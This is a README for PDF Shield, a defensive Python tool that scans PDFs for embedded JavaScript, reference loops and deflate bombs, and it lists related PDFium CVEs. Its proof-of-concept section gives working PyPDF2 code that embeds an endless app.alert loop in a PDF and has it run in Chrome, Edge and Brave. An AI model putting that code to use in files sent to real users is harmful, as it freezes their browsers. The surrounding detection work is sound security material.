whiteSHADOW1234/PDF_Shield

PDF_Shield

Introduction

PDF Shield is a Python-based tool designed to detect and mitigate potential Denial of Service (DoS) attacks and embedded JavaScript threats within PDF files. By analyzing PDF structures, it helps users identify malicious content that could compromise system security.

Features

  • Automated PDF Monitoring: Real-time scan of downloaded PDFs for potential DoS or malicious JavaScript.

  • Drag & Drop: Standalone executable supports drag-and-drop scanning on Windows.

  • Customizable Alerts: Pop-up notifications warn about embedded JavaScript, infinite loops, and deflate bombs.

  • Extensible: Easily add new detection rules via a modular plugin architecture.

  • User-Friendly Interface: Simple command-line & GUI interface for ease of use.

  • Cross-Browser Defense: Focused on the PDFium-based PDF engines in Chrome, Edge, and Brave. The detection methods also cover the most common risks in PDF.js (Firefox).

Motivation

PDF attacks, particularly as part of social engineering campaigns, have become significantly more common. Attackers exploit the flexibility of the PDF format, often using embedded JavaScript to target unsuspecting users. Despite attempts to fix these vulnerabilities, the built-in PDF engines in modern browsers remain exposed. The PDF DoS Detector aims to reduce the number of victims by alerting users to potential DoS attack methods found within PDF files.

Basic PDF Syntax

  You can gain valuable insights into PDF syntax by watching this informative video titled TROOPERS15 Ange Albertini and Kurt Pfeifle - Mastering Advanced PDF Techniques.

  Here are the key points from the video that help explain what this project is about:

  1. A PDF's body section consists of objects, each beginning with <number> <generation> obj and ending with endobj.

  2. Objects refer to one another through indirect references of the form <number> <generation> R; for example, /Pages 1 0 R points to the object declared as 1 0 obj.

    Note: Name objects begin with a forward slash (/), and any character in the name can be written in hexadecimal notation (# followed by two hex digits).

  3. How objects are parsed: [figure]
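
The first two points can be illustrated with a short Python sketch. It is only an approximation under stated assumptions: the helper names `split_objects` and `find_references` are hypothetical (they are not part of PDF Shield), and a plain regular-expression scan does not look inside compressed streams or object streams.

```python
import re

# "<number> <generation> obj ... endobj" (non-greedy body).
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
# Indirect reference: "<number> <generation> R".
REF_RE = re.compile(rb"(\d+)\s+(\d+)\s+R\b")


def split_objects(data: bytes) -> dict:
    """Map (number, generation) -> raw object body (hypothetical helper)."""
    return {
        (int(m.group(1)), int(m.group(2))): m.group(3).strip()
        for m in OBJ_RE.finditer(data)
    }


def find_references(body: bytes) -> list:
    """Return every (number, generation) pair referenced inside a body."""
    return [(int(n), int(g)) for n, g in REF_RE.findall(body)]


sample = b"""3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
>>
endobj
1 0 obj
<< /Type /Pages /Kids [ 2 0 R ] /Count 1 >>
endobj
"""

objects = split_objects(sample)
print(sorted(objects))                    # [(1, 0), (3, 0)]
print(find_references(objects[(3, 0)]))   # [(1, 0)]
```

Keying the dictionary by (number, generation) mirrors how a reference such as 1 0 R is resolved to its target object.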

A Real-World Example

  The information above may not be enough to make sense of the embedded.pdf file (generated by following the steps in the "Simple Attack Method (PoC)" section) when you open it in a text editor such as VSCode.

  You will probably observe two occurrences of /JavaScript within the PDF document:

  1. The first occurrence appears in an object like the one below. It registers the script in the document catalog, which determines when the /JavaScript action will run.
    ...
    3 0 obj
    <<
    /Type /Catalog
    /Pages 1 0 R
    /Names <<
    /JavaScript <<
    /Names [ (41d4efc4\055d000\05546e4\055a973\0556f92c8bbd0f7) 29 0 R ]
    >>
    >>
    >>
    endobj
    ...
    
  2. The second occurrence appears just before the xref section. It tells the PDF viewer to execute the text stored in the /JS entry as JavaScript code.
    ...
    29 0 obj
    <<
    /Type /Action
    /S /JavaScript
    /JS (\012\040\040\040\040app\056alert\050\042Hello\054\040World\041\042\051\073\012)
    >>
    endobj
    xref  <-- This is the beginning of xref part
    ...
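
The /JS value above is hard to read because the characters are written as octal escapes inside a PDF literal string. The following sketch decodes them; `decode_literal_string` is a hypothetical helper name, and the code assumes the input is the text between the outer parentheses.

```python
import re

# Single-character escapes allowed inside a PDF literal string.
SIMPLE_ESCAPES = {
    "n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f",
    "(": "(", ")": ")", "\\": "\\",
}

# A backslash followed by 1-3 octal digits, or by any single character.
ESCAPE_RE = re.compile(r"\\([0-7]{1,3}|.)", re.DOTALL)


def decode_literal_string(raw: str) -> str:
    """Decode backslash escapes in a PDF literal string (hypothetical helper)."""
    def replace(match):
        token = match.group(1)
        if token[0] in "01234567":
            return chr(int(token, 8) & 0xFF)   # octal character code
        if token == "\n":
            return ""                          # backslash-newline: line continuation
        return SIMPLE_ESCAPES.get(token, token)
    return ESCAPE_RE.sub(replace, raw)


js_entry = (r"\012\040\040\040\040app\056alert\050\042Hello\054"
            r"\040World\041\042\051\073\012")
decoded = decode_literal_string(js_entry)
print(repr(decoded))   # '\n    app.alert("Hello, World!");\n'
```

The same decoding applies to the name string in the catalog object, where \055 stands for a hyphen.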
    

Attack

Attacker Model

  • Victim opens malicious PDF document
  • Bad things happen (attack-dependent)
  • No user interaction required

Simple Attack Method (PoC)

Take an embedded-JavaScript attack as an example:

  1. Run pip install PyPDF2 in the terminal.

  2. Next, create a Python script that uses the .add_js() method of the PyPDF2 library:

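    import PyPDF2
    
    def embed_javascript(pdf_file, js_code):
        """Copy every page of pdf_file into a new PDF and attach js_code to it."""
        pdf_reader = PyPDF2.PdfReader(pdf_file)
        pdf_writer = PyPDF2.PdfWriter()
    
        # Copy the pages unchanged.
        for page in pdf_reader.pages:
            pdf_writer.add_page(page)
        # Attach document-level JavaScript to the output.
        pdf_writer.add_js(js_code)
    
        with open('embedded.pdf', "wb") as f:
            pdf_writer.write(f)
    
    # PoC payload: an endless loop of alert boxes.
    javascript_code = '''
    while(1){
        app.alert("Hello, World!");
    }
    '''
    
    # Any existing PDF works as the input file.
    pdf_file_path = 'blank.pdf'
    with open(pdf_file_path, 'rb') as pdf_file:
        embed_javascript(pdf_file, javascript_code)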
  3. Run the Python script you just created.

    Don't forget to update pdf_file_path so that it points to an existing PDF file!

  4. Open the embedded.pdf file in the following web browsers to verify that each one shows an alert window, confirming that the embedded JavaScript code was executed.

    A. Microsoft Edge

    B. Google Chrome

    C. Brave

Defense

Defense Model

  • The user downloads a potentially malicious PDF.
  • The tool conducts an automated scan on the downloaded PDF, presenting the results through a user-friendly pop-up window.
  • The user is empowered to make informed decisions, with options to either eliminate identified vulnerabilities within the PDF or proceed with opening it.

Defense Targets

  • Note: The following tables list CVE information related to PDFium, because this project focuses on building a defense tool for current PDFium-based web browsers such as Chrome, Brave, and Edge. Similar issues may affect other PDF engines; examples include CVE-2023-41257 (Foxit Reader 12.1.2.15356), CVE-2023-38573 (Foxit Reader 12.1.2.15356), and CVE-2022-39016 (PDFtron in M-Files Hubshare before 3.3.10.9).

JavaScript Related Attacks

| Description | Defense Method | Related CVEs or Papers |
|---|---|---|
| JS runs a stored XSS payload | Notify the user that JS is embedded in the PDF | CVE-2023-45207 |
| Remote attackers use JS to cause DoS | Notify the user that JS is embedded in the PDF | CVE-2012-2844 |
| Execution of arbitrary JavaScript code with chrome privileges | Notify the user that JS is embedded in the PDF | CVE-2013-5598 |
| XSS created by injected JS | Notify the user that JS is embedded in the PDF | CVE-2007-0045 |
| Infinite loops caused by JavaScript | Notify the user that JS is embedded in the PDF | CVE-2007-0104 |
| Sharing of objects over calls into the JavaScript runtime | Notify the user that JS is embedded in the PDF | CVE-2019-5772 |
| Form modification caused by JavaScript | Notify the user that JS is embedded in the PDF | Shadow Attacks: Hiding and Replacing Content in Signed PDFs |
  • This project alerts users whenever it finds JavaScript code, for two reasons. First, many attacks are connected to JavaScript, according to Spider Experts. Second, creating a responsive PDF doesn't require JavaScript; there are built-in Named Objects that support responsive actions. JavaScript is only necessary when the PDF depends on it entirely, for example to detect keystrokes or to play videos without using YouTube or other online services.
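
A minimal sketch of this kind of check is shown below. It is an assumption about one possible approach, not the project's actual detection code: the function names are hypothetical, and the scan works on raw bytes, so it cannot see markers hidden inside compressed or encrypted streams. Because name objects may use hexadecimal notation (see "Basic PDF Syntax"), the data is normalized before matching.

```python
import re

# "#XX" hex escape inside a name, e.g. /J#61vaScript.
NAME_HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# /JavaScript or /JS as a complete name token.
JS_NAME_RE = re.compile(rb"/(JavaScript|JS)(?![A-Za-z0-9])")


def normalize_names(data: bytes) -> bytes:
    """Replace #XX escapes with the byte they encode.

    Applied to the whole file for simplicity, which over-approximates
    (it also rewrites '#XX' sequences that are not part of a name).
    """
    return NAME_HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_javascript_markers(data: bytes) -> dict:
    """Count /JavaScript and /JS name tokens in raw PDF bytes."""
    counts = {"JavaScript": 0, "JS": 0}
    for match in JS_NAME_RE.finditer(normalize_names(data)):
        counts[match.group(1).decode("ascii")] += 1
    return counts


sample = b"""3 0 obj
<< /Type /Catalog /Names << /JavaScript << /Names [ (x) 29 0 R ] >> >> >>
endobj
29 0 obj
<< /Type /Action /S /J#61vaScript /JS (void 0;) >>
endobj
"""

counts = count_javascript_markers(sample)
print(counts)   # {'JavaScript': 2, 'JS': 1}
```

Any non-zero count would be enough to trigger the alert described above; the tool does not need to understand what the script does.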

Name Object Infinite Loops

| Description | Defense Method | CVEs |
|---|---|---|
| Loop caused by the Named Object "/Kids" | Notify the user that the PDF contains an infinite loop | CVE-2007-0104 |
| Action loop caused by "/Next" | Notify the user that the PDF contains an infinite loop | CVE-2007-0104 |
| Object streams ("/ObjStm") may extend other object streams | Notify the user that the PDF contains an infinite loop | CVE-2007-0104 |
| Outline entries ("/Outlines") can refer to each other | Notify the user that the PDF contains an infinite loop | CVE-2007-0104 |
| Incorrect object lifecycle | Notify the user that the PDF contains an infinite loop | CVE-2018-18336 |
| Incorrect object lifecycle | Notify the user that the PDF contains an infinite loop | CVE-2018-17481 |
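
Loops of this kind can be found with an ordinary cycle search over the object graph. The sketch below assumes the references have already been extracted into a dictionary that maps each object number to the objects it points to through entries such as /Kids or /Next; `find_cycle` is a hypothetical helper and not necessarily how PDF Shield does it.

```python
def find_cycle(graph: dict, start):
    """Return the nodes of a cycle reachable from `start`, or None.

    Iterative depth-first search, so deeply nested PDFs cannot
    exhaust Python's recursion limit.
    """
    path = [start]          # nodes on the current DFS path, in order
    on_path = {start}
    done = set()            # nodes whose subtrees were fully explored
    stack = [(start, iter(graph.get(start, ())))]
    while stack:
        node, children = stack[-1]
        for child in children:
            if child in on_path:
                # Back edge: the path from `child` onward forms a loop.
                return path[path.index(child):] + [child]
            if child not in done:
                path.append(child)
                on_path.add(child)
                stack.append((child, iter(graph.get(child, ()))))
                break
        else:
            # All children handled: leave this node.
            stack.pop()
            path.pop()
            on_path.discard(node)
            done.add(node)
    return None


# Object 3 lists object 2 in /Kids, and object 2 lists object 3 again.
looping = {1: [2], 2: [3], 3: [2]}
# A diamond shape shares object 4 but contains no loop.
diamond = {1: [2, 3], 2: [4], 3: [4]}

print(find_cycle(looping, 1))   # [2, 3, 2]
print(find_cycle(diamond, 1))   # None
```

Tracking the current path separately from the finished nodes avoids reporting a shared child, as in the diamond case, as a loop.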

Deflate Bomb

| Description | Defense Method | Related CVEs |
|---|---|---|
| Heap buffer overflow | Notify the user that the PDF may contain a deflate bomb | CVE-2020-6513 |
| PDFium does not properly handle certain out-of-memory conditions | Notify the user that the PDF may contain a deflate bomb | CVE-2015-1271 |
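
One way to spot a possible deflate bomb without exhausting memory is to inflate a stream with a hard cap on the output size. The sketch below uses Python's standard zlib module; the function name `inflate_with_limit` and the 1 MB limit are illustrative assumptions, not values taken from PDF Shield.

```python
import zlib


def inflate_with_limit(compressed: bytes, limit: int) -> tuple:
    """Inflate zlib data, but never produce more than `limit` + 1 bytes.

    Returns (output, exceeded), where `exceeded` is True when the stream
    would expand beyond `limit` bytes.
    """
    decompressor = zlib.decompressobj()
    # max_length caps the output; leftover input stays in unconsumed_tail.
    output = decompressor.decompress(compressed, limit + 1)
    exceeded = len(output) > limit
    return output[:limit], exceeded


# 10 MB of zero bytes shrinks to a few kilobytes when compressed.
bomb = zlib.compress(b"\0" * 10_000_000)
harmless = zlib.compress(b"hello")

bomb_output, bomb_exceeded = inflate_with_limit(bomb, 1_000_000)
small_output, small_exceeded = inflate_with_limit(harmless, 1_000_000)

print(len(bomb_output), bomb_exceeded)   # 1000000 True
print(small_output, small_exceeded)      # b'hello' False
```

A scanner could apply such a check to each FlateDecode stream and warn the user as soon as any stream exceeds the chosen limit.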

Usage

I. Clone this repo and automatically scan any downloaded PDF file

  1. Run git clone on this repository, and don't forget to run pip install -r requirements.txt.
  2. Execute the main.py file.
  3. Download a PDF file.
  4. Sit back, relax, and wait for the scanning process to be completed.

II. Manually drag-and-drop a PDF file for scanning

  1. Download the PDF Shield zipped file located in the output directory.
  2. Unzip it on your device.
  3. Locate PDF Shield.exe in the unzipped folder, then right-click it and create a shortcut on your desktop.
  4. Drag-and-drop the PDF you want to scan onto the icon.
  5. Sit back, relax, and wait for the scanning process to be completed.

III. Automatically scan any downloaded PDF file

  1. Download the PDF Shield zipped file located in the output directory.
  2. Unzip it on your device.
  3. Double-click the PDF Shield.exe in the unzipped folder to start the scanning program.
  4. Now, download a PDF file.
  5. Sit back, relax, and wait for the scanning process to be completed.

Contributions

Contributions to the PDF DoS Detector are welcome. Whether it's bug fixes, feature enhancements, or other improvements, feel free to contribute to make the tool more effective in protecting users from PDF-based DoS attacks.

Stay secure, and happy browsing!